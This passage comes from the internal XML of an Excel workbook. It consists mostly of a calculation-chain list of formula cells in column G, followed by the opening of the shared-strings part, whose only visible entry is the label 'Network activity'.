  <c r="G993" i="1"/>
  <c r="G992" i="1"/>
  <c r="G991" i="1"/>
  <c r="G990" i="1"/>
  <c r="G989" i="1"/>
  <c r="G988" i="1"/>
  <c r="G987" i="1"/>
  <c r="G986" i="1"/>
  <c r="G985" i="1"/>
  <c r="G984" i="1"/>
  <c r="G983" i="1"/>
  <c r="G982" i="1"/>
  <c r="G981" i="1"/>
  <c r="G980" i="1"/>
  <c r="G979" i="1"/>
  <c r="G978" i="1"/>
  <c r="G977" i="1"/>
  <c r="G976" i="1"/>
  <c r="G975" i="1"/>
  <c r="G974" i="1"/>
  <c r="G973" i="1"/>
  <c r="G972" i="1"/>
  <c r="G971" i="1"/>
  <c r="G970" i="1"/>
  <c r="G969" i="1"/>
  <c r="G968" i="1"/>
  <c r="G967" i="1"/>
  <c r="G966" i="1"/>
  <c r="G965" i="1"/>
  <c r="G964" i="1"/>
  <c r="G963" i="1"/>
  <c r="G962" i="1"/>
  <c r="G961" i="1"/>
  <c r="G960" i="1"/>
  <c r="G959" i="1"/>
  <c r="G958" i="1"/>
  <c r="G957" i="1"/>
  <c r="G956" i="1"/>
  <c r="G955" i="1"/>
  <c r="G954" i="1"/>
  <c r="G953" i="1"/>
  <c r="G952" i="1"/>
  <c r="G951" i="1"/>
  <c r="G950" i="1"/>
  <c r="G949" i="1"/>
  <c r="G948" i="1"/>
  <c r="G947" i="1"/>
  <c r="G946" i="1"/>
  <c r="G945" i="1"/>
  <c r="G944" i="1"/>
  <c r="G943" i="1"/>
  <c r="G942" i="1"/>
  <c r="G941" i="1"/>
  <c r="G940" i="1"/>
  <c r="G939" i="1"/>
  <c r="G938" i="1"/>
  <c r="G937" i="1"/>
  <c r="G936" i="1"/>
  <c r="G935" i="1"/>
  <c r="G934" i="1"/>
  <c r="G933" i="1"/>
  <c r="G932" i="1"/>
  <c r="G931" i="1"/>
  <c r="G930" i="1"/>
  <c r="G929" i="1"/>
  <c r="G928" i="1"/>
  <c r="G927" i="1"/>
  <c r="G926" i="1"/>
  <c r="G925" i="1"/>
  <c r="G924" i="1"/>
  <c r="G923" i="1"/>
  <c r="G922" i="1"/>
  <c r="G921" i="1"/>
  <c r="G920" i="1"/>
  <c r="G919" i="1"/>
  <c r="G918" i="1"/>
  <c r="G917" i="1"/>
  <c r="G916" i="1"/>
  <c r="G915" i="1"/>
  <c r="G914" i="1"/>
  <c r="G913" i="1"/>
  <c r="G912" i="1"/>
  <c r="G911" i="1"/>
  <c r="G910" i="1"/>
  <c r="G909" i="1"/>
  <c r="G908" i="1"/>
  <c r="G907" i="1"/>
  <c r="G906" i="1"/>
  <c r="G905" i="1"/>
  <c r="G904" i="1"/>
  <c r="G903" i="1"/>
  <c r="G902" i="1"/>
  <c r="G901" i="1"/>
  <c r="G900" i="1"/>
  <c r="G899" i="1"/>
  <c r="G898" i="1"/>
  <c r="G897" i="1"/>
  <c r="G896" i="1"/>
  <c r="G895" i="1"/>
  <c r="G894" i="1"/>
  <c r="G893" i="1"/>
  <c r="G892" i="1"/>
  <c r="G891" i="1"/>
  <c r="G890" i="1"/>
  <c r="G889" i="1"/>
  <c r="G888" i="1"/>
  <c r="G887" i="1"/>
  <c r="G886" i="1"/>
  <c r="G885" i="1"/>
  <c r="G884" i="1"/>
  <c r="G883" i="1"/>
  <c r="G882" i="1"/>
  <c r="G881" i="1"/>
  <c r="G880" i="1"/>
  <c r="G879" i="1"/>
  <c r="G878" i="1"/>
  <c r="G877" i="1"/>
  <c r="G876" i="1"/>
  <c r="G875" i="1"/>
  <c r="G874" i="1"/>
  <c r="G873" i="1"/>
  <c r="G872" i="1"/>
  <c r="G871" i="1"/>
  <c r="G870" i="1"/>
  <c r="G869" i="1"/>
  <c r="G868" i="1"/>
  <c r="G867" i="1"/>
  <c r="G866" i="1"/>
  <c r="G865" i="1"/>
  <c r="G864" i="1"/>
  <c r="G863" i="1"/>
  <c r="G862" i="1"/>
  <c r="G861" i="1"/>
  <c r="G860" i="1"/>
  <c r="G859" i="1"/>
  <c r="G858" i="1"/>
  <c r="G857" i="1"/>
  <c r="G856" i="1"/>
  <c r="G855" i="1"/>
  <c r="G854" i="1"/>
  <c r="G853" i="1"/>
  <c r="G852" i="1"/>
  <c r="G851" i="1"/>
  <c r="G850" i="1"/>
  <c r="G849" i="1"/>
  <c r="G848" i="1"/>
  <c r="G847" i="1"/>
  <c r="G846" i="1"/>
  <c r="G845" i="1"/>
  <c r="G844" i="1"/>
  <c r="G843" i="1"/>
  <c r="G842" i="1"/>
  <c r="G841" i="1"/>
  <c r="G840" i="1"/>
  <c r="G839" i="1"/>
  <c r="G838" i="1"/>
  <c r="G837" i="1"/>
  <c r="G836" i="1"/>
  <c r="G835" i="1"/>
  <c r="G834" i="1"/>
  <c r="G833" i="1"/>
  <c r="G832" i="1"/>
  <c r="G831" i="1"/>
  <c r="G830" i="1"/>
  <c r="G829" i="1"/>
  <c r="G828" i="1"/>
  <c r="G827" i="1"/>
  <c r="G826" i="1"/>
  <c r="G825" i="1"/>
  <c r="G824" i="1"/>
  <c r="G823" i="1"/>
  <c r="G822" i="1"/>
  <c r="G821" i="1"/>
  <c r="G820" i="1"/>
  <c r="G819" i="1"/>
  <c r="G818" i="1"/>
  <c r="G817" i="1"/>
  <c r="G816" i="1"/>
  <c r="G815" i="1"/>
  <c r="G814" i="1"/>
  <c r="G813" i="1"/>
  <c r="G812" i="1"/>
  <c r="G811" i="1"/>
  <c r="G810" i="1"/>
  <c r="G809" i="1"/>
  <c r="G808" i="1"/>
  <c r="G807" i="1"/>
  <c r="G806" i="1"/>
  <c r="G805" i="1"/>
  <c r="G804" i="1"/>
  <c r="G803" i="1"/>
  <c r="G802" i="1"/>
  <c r="G801" i="1"/>
  <c r="G800" i="1"/>
  <c r="G799" i="1"/>
  <c r="G798" i="1"/>
  <c r="G797" i="1"/>
  <c r="G796" i="1"/>
  <c r="G795" i="1"/>
  <c r="G794" i="1"/>
  <c r="G793" i="1"/>
  <c r="G792" i="1"/>
  <c r="G791" i="1"/>
  <c r="G790" i="1"/>
  <c r="G789" i="1"/>
  <c r="G788" i="1"/>
  <c r="G787" i="1"/>
  <c r="G786" i="1"/>
  <c r="G785" i="1"/>
  <c r="G784" i="1"/>
  <c r="G783" i="1"/>
  <c r="G782" i="1"/>
  <c r="G781" i="1"/>
  <c r="G780" i="1"/>
  <c r="G779" i="1"/>
  <c r="G778" i="1"/>
  <c r="G777" i="1"/>
  <c r="G776" i="1"/>
  <c r="G775" i="1"/>
  <c r="G774" i="1"/>
  <c r="G773" i="1"/>
  <c r="G772" i="1"/>
  <c r="G771" i="1"/>
  <c r="G770" i="1"/>
  <c r="G769" i="1"/>
  <c r="G768" i="1"/>
  <c r="G767" i="1"/>
  <c r="G766" i="1"/>
  <c r="G765" i="1"/>
  <c r="G764" i="1"/>
  <c r="G763" i="1"/>
  <c r="G762" i="1"/>
  <c r="G761" i="1"/>
  <c r="G760" i="1"/>
  <c r="G759" i="1"/>
  <c r="G758" i="1"/>
  <c r="G757" i="1"/>
  <c r="G756" i="1"/>
  <c r="G755" i="1"/>
  <c r="G754" i="1"/>
  <c r="G753" i="1"/>
  <c r="G752" i="1"/>
  <c r="G751" i="1"/>
  <c r="G750" i="1"/>
  <c r="G749" i="1"/>
  <c r="G748" i="1"/>
  <c r="G747" i="1"/>
  <c r="G746" i="1"/>
  <c r="G745" i="1"/>
  <c r="G744" i="1"/>
  <c r="G743" i="1"/>
  <c r="G742" i="1"/>
  <c r="G741" i="1"/>
  <c r="G740" i="1"/>
  <c r="G739" i="1"/>
  <c r="G738" i="1"/>
  <c r="G737" i="1"/>
  <c r="G736" i="1"/>
  <c r="G735" i="1"/>
  <c r="G734" i="1"/>
  <c r="G733" i="1"/>
  <c r="G732" i="1"/>
  <c r="G731" i="1"/>
  <c r="G730" i="1"/>
  <c r="G729" i="1"/>
  <c r="G728" i="1"/>
  <c r="G727" i="1"/>
  <c r="G726" i="1"/>
  <c r="G725" i="1"/>
  <c r="G724" i="1"/>
  <c r="G723" i="1"/>
  <c r="G722" i="1"/>
  <c r="G721" i="1"/>
  <c r="G720" i="1"/>
  <c r="G719" i="1"/>
  <c r="G718" i="1"/>
  <c r="G717" i="1"/>
  <c r="G716" i="1"/>
  <c r="G715" i="1"/>
  <c r="G714" i="1"/>
  <c r="G713" i="1"/>
  <c r="G712" i="1"/>
  <c r="G711" i="1"/>
  <c r="G710" i="1"/>
  <c r="G709" i="1"/>
  <c r="G708" i="1"/>
  <c r="G707" i="1"/>
  <c r="G706" i="1"/>
  <c r="G705" i="1"/>
  <c r="G704" i="1"/>
  <c r="G703" i="1"/>
  <c r="G702" i="1"/>
  <c r="G701" i="1"/>
  <c r="G700" i="1"/>
  <c r="G699" i="1"/>
  <c r="G698" i="1"/>
  <c r="G697" i="1"/>
  <c r="G696" i="1"/>
  <c r="G695" i="1"/>
  <c r="G694" i="1"/>
  <c r="G693" i="1"/>
  <c r="G692" i="1"/>
  <c r="G691" i="1"/>
  <c r="G690" i="1"/>
  <c r="G689" i="1"/>
  <c r="G688" i="1"/>
  <c r="G687" i="1"/>
  <c r="G686" i="1"/>
  <c r="G685" i="1"/>
  <c r="G684" i="1"/>
  <c r="G683" i="1"/>
  <c r="G682" i="1"/>
  <c r="G681" i="1"/>
  <c r="G680" i="1"/>
  <c r="G679" i="1"/>
  <c r="G678" i="1"/>
  <c r="G677" i="1"/>
  <c r="G676" i="1"/>
  <c r="G675" i="1"/>
  <c r="G674" i="1"/>
  <c r="G673" i="1"/>
  <c r="G672" i="1"/>
  <c r="G671" i="1"/>
  <c r="G670" i="1"/>
  <c r="G669" i="1"/>
  <c r="G668" i="1"/>
  <c r="G667" i="1"/>
  <c r="G666" i="1"/>
  <c r="G665" i="1"/>
  <c r="G664" i="1"/>
  <c r="G663" i="1"/>
  <c r="G662" i="1"/>
  <c r="G661" i="1"/>
  <c r="G660" i="1"/>
  <c r="G659" i="1"/>
  <c r="G658" i="1"/>
  <c r="G657" i="1"/>
  <c r="G656" i="1"/>
  <c r="G655" i="1"/>
  <c r="G654" i="1"/>
  <c r="G653" i="1"/>
  <c r="G652" i="1"/>
  <c r="G651" i="1"/>
  <c r="G650" i="1"/>
  <c r="G649" i="1"/>
  <c r="G648" i="1"/>
  <c r="G647" i="1"/>
  <c r="G646" i="1"/>
  <c r="G645" i="1"/>
  <c r="G644" i="1"/>
  <c r="G643" i="1"/>
  <c r="G642" i="1"/>
  <c r="G641" i="1"/>
  <c r="G640" i="1"/>
  <c r="G639" i="1"/>
  <c r="G638" i="1"/>
  <c r="G637" i="1"/>
  <c r="G636" i="1"/>
  <c r="G635" i="1"/>
  <c r="G634" i="1"/>
  <c r="G633" i="1"/>
  <c r="G632" i="1"/>
  <c r="G631" i="1"/>
  <c r="G630" i="1"/>
  <c r="G629" i="1"/>
  <c r="G628" i="1"/>
  <c r="G627" i="1"/>
  <c r="G626" i="1"/>
  <c r="G625" i="1"/>
  <c r="G624" i="1"/>
  <c r="G623" i="1"/>
  <c r="G622" i="1"/>
  <c r="G621" i="1"/>
  <c r="G620" i="1"/>
  <c r="G619" i="1"/>
  <c r="G618" i="1"/>
  <c r="G617" i="1"/>
  <c r="G616" i="1"/>
  <c r="G615" i="1"/>
  <c r="G614" i="1"/>
  <c r="G613" i="1"/>
  <c r="G612" i="1"/>
  <c r="G611" i="1"/>
  <c r="G610" i="1"/>
  <c r="G609" i="1"/>
  <c r="G608" i="1"/>
  <c r="G607" i="1"/>
  <c r="G606" i="1"/>
  <c r="G605" i="1"/>
  <c r="G604" i="1"/>
  <c r="G603" i="1"/>
  <c r="G602" i="1"/>
  <c r="G601" i="1"/>
  <c r="G600" i="1"/>
  <c r="G599" i="1"/>
  <c r="G598" i="1"/>
  <c r="G597" i="1"/>
  <c r="G596" i="1"/>
  <c r="G595" i="1"/>
  <c r="G594" i="1"/>
  <c r="G593" i="1"/>
  <c r="G592" i="1"/>
  <c r="G591" i="1"/>
  <c r="G590" i="1"/>
  <c r="G589" i="1"/>
  <c r="G588" i="1"/>
  <c r="G587" i="1"/>
  <c r="G586" i="1"/>
  <c r="G585" i="1"/>
  <c r="G584" i="1"/>
  <c r="G583" i="1"/>
  <c r="G582" i="1"/>
  <c r="G581" i="1"/>
  <c r="G580" i="1"/>
  <c r="G579" i="1"/>
  <c r="G578" i="1"/>
  <c r="G577" i="1"/>
  <c r="G576" i="1"/>
  <c r="G575" i="1"/>
  <c r="G574" i="1"/>
  <c r="G573" i="1"/>
  <c r="G572" i="1"/>
  <c r="G571" i="1"/>
  <c r="G570" i="1"/>
  <c r="G569" i="1"/>
  <c r="G568" i="1"/>
  <c r="G567" i="1"/>
  <c r="G566" i="1"/>
  <c r="G565" i="1"/>
  <c r="G564" i="1"/>
  <c r="G563" i="1"/>
  <c r="G562" i="1"/>
  <c r="G561" i="1"/>
  <c r="G560" i="1"/>
  <c r="G559" i="1"/>
  <c r="G558" i="1"/>
  <c r="G557" i="1"/>
  <c r="G556" i="1"/>
  <c r="G555" i="1"/>
  <c r="G554" i="1"/>
  <c r="G553" i="1"/>
  <c r="G552" i="1"/>
  <c r="G551" i="1"/>
  <c r="G550" i="1"/>
  <c r="G549" i="1"/>
  <c r="G548" i="1"/>
  <c r="G547" i="1"/>
  <c r="G546" i="1"/>
  <c r="G545" i="1"/>
  <c r="G544" i="1"/>
  <c r="G543" i="1"/>
  <c r="G542" i="1"/>
  <c r="G541" i="1"/>
  <c r="G540" i="1"/>
  <c r="G539" i="1"/>
  <c r="G538" i="1"/>
  <c r="G537" i="1"/>
  <c r="G536" i="1"/>
  <c r="G535" i="1"/>
  <c r="G534" i="1"/>
  <c r="G533" i="1"/>
  <c r="G532" i="1"/>
  <c r="G531" i="1"/>
  <c r="G530" i="1"/>
  <c r="G529" i="1"/>
  <c r="G528" i="1"/>
  <c r="G527" i="1"/>
  <c r="G526" i="1"/>
  <c r="G525" i="1"/>
  <c r="G524" i="1"/>
  <c r="G523" i="1"/>
  <c r="G522" i="1"/>
  <c r="G521" i="1"/>
  <c r="G520" i="1"/>
  <c r="G519" i="1"/>
  <c r="G518" i="1"/>
  <c r="G517" i="1"/>
  <c r="G516" i="1"/>
  <c r="G515" i="1"/>
  <c r="G514" i="1"/>
  <c r="G513" i="1"/>
  <c r="G512" i="1"/>
  <c r="G511" i="1"/>
  <c r="G510" i="1"/>
  <c r="G509" i="1"/>
  <c r="G508" i="1"/>
  <c r="G507" i="1"/>
  <c r="G506" i="1"/>
  <c r="G505" i="1"/>
  <c r="G504" i="1"/>
  <c r="G503" i="1"/>
  <c r="G502" i="1"/>
  <c r="G501" i="1"/>
  <c r="G500" i="1"/>
  <c r="G499" i="1"/>
  <c r="G498" i="1"/>
  <c r="G497" i="1"/>
  <c r="G496" i="1"/>
  <c r="G495" i="1"/>
  <c r="G494" i="1"/>
  <c r="G493" i="1"/>
  <c r="G492" i="1"/>
  <c r="G491" i="1"/>
  <c r="G490" i="1"/>
  <c r="G489" i="1"/>
  <c r="G488" i="1"/>
  <c r="G487" i="1"/>
  <c r="G486" i="1"/>
  <c r="G485" i="1"/>
  <c r="G484" i="1"/>
  <c r="G483" i="1"/>
  <c r="G482" i="1"/>
  <c r="G481" i="1"/>
  <c r="G480" i="1"/>
  <c r="G479" i="1"/>
  <c r="G478" i="1"/>
  <c r="G477" i="1"/>
  <c r="G476" i="1"/>
  <c r="G475" i="1"/>
  <c r="G474" i="1"/>
  <c r="G473" i="1"/>
  <c r="G472" i="1"/>
  <c r="G471" i="1"/>
  <c r="G470" i="1"/>
  <c r="G469" i="1"/>
  <c r="G468" i="1"/>
  <c r="G467" i="1"/>
  <c r="G466" i="1"/>
  <c r="G465" i="1"/>
  <c r="G464" i="1"/>
  <c r="G463" i="1"/>
  <c r="G462" i="1"/>
  <c r="G461" i="1"/>
  <c r="G460" i="1"/>
  <c r="G459" i="1"/>
  <c r="G458" i="1"/>
  <c r="G457" i="1"/>
  <c r="G456" i="1"/>
  <c r="G455" i="1"/>
  <c r="G454" i="1"/>
  <c r="G453" i="1"/>
  <c r="G452" i="1"/>
  <c r="G451" i="1"/>
  <c r="G450" i="1"/>
  <c r="G449" i="1"/>
  <c r="G448" i="1"/>
  <c r="G447" i="1"/>
  <c r="G446" i="1"/>
  <c r="G445" i="1"/>
  <c r="G444" i="1"/>
  <c r="G443" i="1"/>
  <c r="G442" i="1"/>
  <c r="G441" i="1"/>
  <c r="G440" i="1"/>
  <c r="G439" i="1"/>
  <c r="G438" i="1"/>
  <c r="G437" i="1"/>
  <c r="G436" i="1"/>
  <c r="G435" i="1"/>
  <c r="G434" i="1"/>
  <c r="G433" i="1"/>
  <c r="G432" i="1"/>
  <c r="G431" i="1"/>
  <c r="G430" i="1"/>
  <c r="G429" i="1"/>
  <c r="G428" i="1"/>
  <c r="G427" i="1"/>
  <c r="G426" i="1"/>
  <c r="G425" i="1"/>
  <c r="G424" i="1"/>
  <c r="G423" i="1"/>
  <c r="G422" i="1"/>
  <c r="G421" i="1"/>
  <c r="G420" i="1"/>
  <c r="G419" i="1"/>
  <c r="G418" i="1"/>
  <c r="G417" i="1"/>
  <c r="G416" i="1"/>
  <c r="G415" i="1"/>
  <c r="G414" i="1"/>
  <c r="G413" i="1"/>
  <c r="G412" i="1"/>
  <c r="G411" i="1"/>
  <c r="G410" i="1"/>
  <c r="G409" i="1"/>
  <c r="G408" i="1"/>
  <c r="G407" i="1"/>
  <c r="G406" i="1"/>
  <c r="G405" i="1"/>
  <c r="G404" i="1"/>
  <c r="G403" i="1"/>
  <c r="G402" i="1"/>
  <c r="G401" i="1"/>
  <c r="G400" i="1"/>
  <c r="G399" i="1"/>
  <c r="G398" i="1"/>
  <c r="G397" i="1"/>
  <c r="G396" i="1"/>
  <c r="G395" i="1"/>
  <c r="G394" i="1"/>
  <c r="G393" i="1"/>
  <c r="G392" i="1"/>
  <c r="G391" i="1"/>
  <c r="G390" i="1"/>
  <c r="G389" i="1"/>
  <c r="G388" i="1"/>
  <c r="G387" i="1"/>
  <c r="G386" i="1"/>
  <c r="G385" i="1"/>
  <c r="G384" i="1"/>
  <c r="G383" i="1"/>
  <c r="G382" i="1"/>
  <c r="G381" i="1"/>
  <c r="G380" i="1"/>
  <c r="G379" i="1"/>
  <c r="G378" i="1"/>
  <c r="G377" i="1"/>
  <c r="G376" i="1"/>
  <c r="G375" i="1"/>
  <c r="G374" i="1"/>
  <c r="G373" i="1"/>
  <c r="G372" i="1"/>
  <c r="G371" i="1"/>
  <c r="G370" i="1"/>
  <c r="G369" i="1"/>
  <c r="G368" i="1"/>
  <c r="G367" i="1"/>
  <c r="G366" i="1"/>
  <c r="G365" i="1"/>
  <c r="G364" i="1"/>
  <c r="G363" i="1"/>
  <c r="G362" i="1"/>
  <c r="G361" i="1"/>
  <c r="G360" i="1"/>
  <c r="G359" i="1"/>
  <c r="G358" i="1"/>
  <c r="G357" i="1"/>
  <c r="G356" i="1"/>
  <c r="G355" i="1"/>
  <c r="G354" i="1"/>
  <c r="G353" i="1"/>
  <c r="G352" i="1"/>
  <c r="G351" i="1"/>
  <c r="G350" i="1"/>
  <c r="G349" i="1"/>
  <c r="G348" i="1"/>
  <c r="G347" i="1"/>
  <c r="G346" i="1"/>
  <c r="G345" i="1"/>
  <c r="G344" i="1"/>
  <c r="G343" i="1"/>
  <c r="G342" i="1"/>
  <c r="G341" i="1"/>
  <c r="G340" i="1"/>
  <c r="G339" i="1"/>
  <c r="G338" i="1"/>
  <c r="G337" i="1"/>
  <c r="G336" i="1"/>
  <c r="G335" i="1"/>
  <c r="G334" i="1"/>
  <c r="G333" i="1"/>
  <c r="G332" i="1"/>
  <c r="G331" i="1"/>
  <c r="G330" i="1"/>
  <c r="G329" i="1"/>
  <c r="G328" i="1"/>
  <c r="G327" i="1"/>
  <c r="G326" i="1"/>
  <c r="G325" i="1"/>
  <c r="G324" i="1"/>
  <c r="G323" i="1"/>
  <c r="G322" i="1"/>
  <c r="G321" i="1"/>
  <c r="G320" i="1"/>
  <c r="G319" i="1"/>
  <c r="G318" i="1"/>
  <c r="G317" i="1"/>
  <c r="G316" i="1"/>
  <c r="G315" i="1"/>
  <c r="G314" i="1"/>
  <c r="G313" i="1"/>
  <c r="G312" i="1"/>
  <c r="G311" i="1"/>
  <c r="G310" i="1"/>
  <c r="G309" i="1"/>
  <c r="G308" i="1"/>
  <c r="G307" i="1"/>
  <c r="G306" i="1"/>
  <c r="G305" i="1"/>
  <c r="G304" i="1"/>
  <c r="G303" i="1"/>
  <c r="G302" i="1"/>
  <c r="G301" i="1"/>
  <c r="G300" i="1"/>
  <c r="G299" i="1"/>
  <c r="G298" i="1"/>
  <c r="G297" i="1"/>
  <c r="G296" i="1"/>
  <c r="G295" i="1"/>
  <c r="G294" i="1"/>
  <c r="G293" i="1"/>
  <c r="G292" i="1"/>
  <c r="G291" i="1"/>
  <c r="G290" i="1"/>
  <c r="G289" i="1"/>
  <c r="G288" i="1"/>
  <c r="G287" i="1"/>
  <c r="G286" i="1"/>
  <c r="G285" i="1"/>
  <c r="G284" i="1"/>
  <c r="G283" i="1"/>
  <c r="G282" i="1"/>
  <c r="G281" i="1"/>
  <c r="G280" i="1"/>
  <c r="G279" i="1"/>
  <c r="G278" i="1"/>
  <c r="G277" i="1"/>
  <c r="G276" i="1"/>
  <c r="G275" i="1"/>
  <c r="G274" i="1"/>
  <c r="G273" i="1"/>
  <c r="G272" i="1"/>
  <c r="G271" i="1"/>
  <c r="G270" i="1"/>
  <c r="G269" i="1"/>
  <c r="G268" i="1"/>
  <c r="G267" i="1"/>
  <c r="G266" i="1"/>
  <c r="G265" i="1"/>
  <c r="G264" i="1"/>
  <c r="G263" i="1"/>
  <c r="G262" i="1"/>
  <c r="G261" i="1"/>
  <c r="G260" i="1"/>
  <c r="G259" i="1"/>
  <c r="G258" i="1"/>
  <c r="G257" i="1"/>
  <c r="G256" i="1"/>
  <c r="G255" i="1"/>
  <c r="G254" i="1"/>
  <c r="G253" i="1"/>
  <c r="G252" i="1"/>
  <c r="G251" i="1"/>
  <c r="G250" i="1"/>
  <c r="G249" i="1"/>
  <c r="G248" i="1"/>
  <c r="G247" i="1"/>
  <c r="G246" i="1"/>
  <c r="G245" i="1"/>
  <c r="G244" i="1"/>
  <c r="G243" i="1"/>
  <c r="G242" i="1"/>
  <c r="G241" i="1"/>
  <c r="G240" i="1"/>
  <c r="G239" i="1"/>
  <c r="G238" i="1"/>
  <c r="G237" i="1"/>
  <c r="G236" i="1"/>
  <c r="G235" i="1"/>
  <c r="G234" i="1"/>
  <c r="G233" i="1"/>
  <c r="G232" i="1"/>
  <c r="G231" i="1"/>
  <c r="G230" i="1"/>
  <c r="G229" i="1"/>
  <c r="G228" i="1"/>
  <c r="G227" i="1"/>
  <c r="G226" i="1"/>
  <c r="G225" i="1"/>
  <c r="G224" i="1"/>
  <c r="G223" i="1"/>
  <c r="G222" i="1"/>
  <c r="G221" i="1"/>
  <c r="G220" i="1"/>
  <c r="G219" i="1"/>
  <c r="G218" i="1"/>
  <c r="G217" i="1"/>
  <c r="G216" i="1"/>
  <c r="G215" i="1"/>
  <c r="G214" i="1"/>
  <c r="G213" i="1"/>
  <c r="G212" i="1"/>
  <c r="G211" i="1"/>
  <c r="G210" i="1"/>
  <c r="G209" i="1"/>
  <c r="G208" i="1"/>
  <c r="G207" i="1"/>
  <c r="G206" i="1"/>
  <c r="G205" i="1"/>
  <c r="G204" i="1"/>
  <c r="G203" i="1"/>
  <c r="G202" i="1"/>
  <c r="G201" i="1"/>
  <c r="G200" i="1"/>
  <c r="G199" i="1"/>
  <c r="G198" i="1"/>
  <c r="G197" i="1"/>
  <c r="G196" i="1"/>
  <c r="G195" i="1"/>
  <c r="G194" i="1"/>
  <c r="G193" i="1"/>
  <c r="G192" i="1"/>
  <c r="G191" i="1"/>
  <c r="G190" i="1"/>
  <c r="G189" i="1"/>
  <c r="G188" i="1"/>
  <c r="G187" i="1"/>
  <c r="G186" i="1"/>
  <c r="G185" i="1"/>
  <c r="G184" i="1"/>
  <c r="G183" i="1"/>
  <c r="G182" i="1"/>
  <c r="G181" i="1"/>
  <c r="G180" i="1"/>
  <c r="G179" i="1"/>
  <c r="G178" i="1"/>
  <c r="G177" i="1"/>
  <c r="G176" i="1"/>
  <c r="G175" i="1"/>
  <c r="G174" i="1"/>
  <c r="G173" i="1"/>
  <c r="G172" i="1"/>
  <c r="G171" i="1"/>
  <c r="G170" i="1"/>
  <c r="G169" i="1"/>
  <c r="G168" i="1"/>
  <c r="G167" i="1"/>
  <c r="G166" i="1"/>
  <c r="G165" i="1"/>
  <c r="G164" i="1"/>
  <c r="G163" i="1"/>
  <c r="G162" i="1"/>
  <c r="G161" i="1"/>
  <c r="G160" i="1"/>
  <c r="G159" i="1"/>
  <c r="G158" i="1"/>
  <c r="G157" i="1"/>
  <c r="G156" i="1"/>
  <c r="G155" i="1"/>
  <c r="G154" i="1"/>
  <c r="G153" i="1"/>
  <c r="G152" i="1"/>
  <c r="G151" i="1"/>
  <c r="G150" i="1"/>
  <c r="G149" i="1"/>
  <c r="G148" i="1"/>
  <c r="G147" i="1"/>
  <c r="G146" i="1"/>
  <c r="G145" i="1"/>
  <c r="G144" i="1"/>
  <c r="G143" i="1"/>
  <c r="G142" i="1"/>
  <c r="G141" i="1"/>
  <c r="G140" i="1"/>
  <c r="G139" i="1"/>
  <c r="G138" i="1"/>
  <c r="G137" i="1"/>
  <c r="G136" i="1"/>
  <c r="G135" i="1"/>
  <c r="G134" i="1"/>
  <c r="G133" i="1"/>
  <c r="G132" i="1"/>
  <c r="G131" i="1"/>
  <c r="G130" i="1"/>
  <c r="G129" i="1"/>
  <c r="G128" i="1"/>
  <c r="G127" i="1"/>
  <c r="G126" i="1"/>
  <c r="G125" i="1"/>
  <c r="G124" i="1"/>
  <c r="G123" i="1"/>
  <c r="G122" i="1"/>
  <c r="G121" i="1"/>
  <c r="G120" i="1"/>
  <c r="G119" i="1"/>
  <c r="G118" i="1"/>
  <c r="G117" i="1"/>
  <c r="G116" i="1"/>
  <c r="G115" i="1"/>
  <c r="G114" i="1"/>
  <c r="G113" i="1"/>
  <c r="G112" i="1"/>
  <c r="G111" i="1"/>
  <c r="G110" i="1"/>
  <c r="G109" i="1"/>
  <c r="G108" i="1"/>
  <c r="G107" i="1"/>
  <c r="G106" i="1"/>
  <c r="G105" i="1"/>
  <c r="G104" i="1"/>
  <c r="G103" i="1"/>
  <c r="G102" i="1"/>
  <c r="G101" i="1"/>
  <c r="G100" i="1"/>
  <c r="G99" i="1"/>
  <c r="G98" i="1"/>
  <c r="G97" i="1"/>
  <c r="G96" i="1"/>
  <c r="G95" i="1"/>
  <c r="G94" i="1"/>
  <c r="G93" i="1"/>
  <c r="G92" i="1"/>
  <c r="G91" i="1"/>
  <c r="G90" i="1"/>
  <c r="G89" i="1"/>
  <c r="G88" i="1"/>
  <c r="G87" i="1"/>
  <c r="G86" i="1"/>
  <c r="G85" i="1"/>
  <c r="G84" i="1"/>
  <c r="G83" i="1"/>
  <c r="G82" i="1"/>
  <c r="G81" i="1"/>
  <c r="G80" i="1"/>
  <c r="G79" i="1"/>
  <c r="G78" i="1"/>
  <c r="G77" i="1"/>
  <c r="G76" i="1"/>
  <c r="G75" i="1"/>
  <c r="G74" i="1"/>
  <c r="G73" i="1"/>
  <c r="G72" i="1"/>
  <c r="G71" i="1"/>
  <c r="G70" i="1"/>
  <c r="G69" i="1"/>
  <c r="G68" i="1"/>
  <c r="G67" i="1"/>
  <c r="G66" i="1"/>
  <c r="G65" i="1"/>
  <c r="G64" i="1"/>
  <c r="G63" i="1"/>
  <c r="G62" i="1"/>
  <c r="G61" i="1"/>
  <c r="G60" i="1"/>
  <c r="G59" i="1"/>
  <c r="G58" i="1"/>
  <c r="G57" i="1"/>
  <c r="G56" i="1"/>
  <c r="G55" i="1"/>
  <c r="G54" i="1"/>
  <c r="G53" i="1"/>
  <c r="G52" i="1"/>
  <c r="G51" i="1"/>
  <c r="G50" i="1"/>
  <c r="G49" i="1"/>
  <c r="G48" i="1"/>
  <c r="G47" i="1"/>
  <c r="G46" i="1"/>
  <c r="G45" i="1"/>
  <c r="G44" i="1"/>
  <c r="G43" i="1"/>
  <c r="G42" i="1"/>
  <c r="G41" i="1"/>
  <c r="G40" i="1"/>
  <c r="G39" i="1"/>
  <c r="G38" i="1"/>
  <c r="G37" i="1"/>
  <c r="G36" i="1"/>
  <c r="G35" i="1"/>
  <c r="G34" i="1"/>
  <c r="G33" i="1"/>
  <c r="G32" i="1"/>
  <c r="G31" i="1"/>
  <c r="G30" i="1"/>
  <c r="G29" i="1"/>
  <c r="G28" i="1"/>
  <c r="G27" i="1"/>
  <c r="G26" i="1"/>
  <c r="G25" i="1"/>
  <c r="G24" i="1"/>
  <c r="G23" i="1"/>
  <c r="G22" i="1"/>
  <c r="G21" i="1"/>
  <c r="G20" i="1"/>
  <c r="G19" i="1"/>
  <c r="G18" i="1"/>
  <c r="G17" i="1"/>
  <c r="G16" i="1"/>
  <c r="G15" i="1"/>
  <c r="G14" i="1"/>
  <c r="G13" i="1"/>
  <c r="G12" i="1"/>
  <c r="G11" i="1"/>
  <c r="G10" i="1"/>
  <c r="G9" i="1"/>
  <c r="G8" i="1"/>
  <c r="G7" i="1"/>
  <c r="G6" i="1"/>
  <c r="G5" i="1"/>
  <c r="G4" i="1"/>
  <c r="G3" i="1"/>
  <c r="G2" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="36654" uniqueCount="4595">
  <si>
    <t>Network activity</t>
